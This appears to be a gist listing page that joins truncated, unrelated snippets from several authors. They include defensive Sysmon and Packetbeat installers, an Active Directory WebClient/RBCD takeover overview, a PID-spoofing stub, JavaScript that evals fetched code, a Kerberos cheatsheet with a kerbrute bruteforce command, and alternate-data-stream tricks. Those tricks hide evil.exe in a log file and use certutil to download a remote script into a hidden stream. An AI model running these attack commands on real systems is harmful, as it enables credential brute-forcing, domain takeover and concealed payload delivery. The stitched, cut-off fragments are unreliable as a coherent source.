taylorwalton

#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PACKETBEAT_YAML="https://raw.githubusercontent.com/socfortress/Wazuh-Rules/main/Packetbeat/packetbeat.yml"

logger() {

    now=$(date +'%m/%d/%Y %H:%M:%S')
    case $1 in 
        "-e")
            mtype="ERROR:"

taylorwalton

$sysinternals_repo = 'download.sysinternals.com'
$sysinternals_downloadlink = 'https://download.sysinternals.com/files/SysinternalsSuite.zip'
$sysinternals_folder = 'C:\Program Files\sysinternals'
$sysinternals_zip = 'SysinternalsSuite.zip'
$sysmonconfig_downloadlink = 'https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml'
$sysmonconfig_file = 'sysmonconfig-export.xml'

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

if (Test-Path -Path $sysinternals_folder) {

gladiatx0r

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

• Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
• Relaying that machine authentication to LDAPS for configuring RBCD
• RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

jfmaes

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;


namespace DInvoke_PIDSpoof_DevNuget
{
    class Program
    {
        static void Main(string[] args)

djD-REK

// <script src="https://code.jquery.com/jquery-3.5.0.js"></script>
const loadScript = async (url) => {
  const response = await fetch(url)
  const script = await response.text()
  Function(script)
}

const scriptUrl = "https://code.jquery.com/jquery-3.5.0.js"
loadScript(scriptUrl)

djD-REK

const loadScript = async (url) => {
  const response = await fetch(url)
  const script = await response.text()
  eval(script)
}

const scriptUrl = "script.js"
loadScript(scriptUrl)

X-C3LL

#!/usr/bin/python
#coding: utf-8

# F-Isolation v0.1 - F**k isolated enviroments

# Because we hate that kind of pentests where you start at an isolated citrix where our
# clipboard is useless, we do not have internet access inside the machine and we can not
# map a local resource to upload our tools.

# OCR + Keyboard emulation FTW!

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

EdOverflow

• https://scans.io/
• https://commoncrawl.org/
• https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
• https://www.shodan.io/
• https://opendata.rapid7.com/
• https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
• https://securitytrails.com/
• https://threatcrowd.org/
• https://dnsdumpster.com/
• https://crt.sh/

api0cradle

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab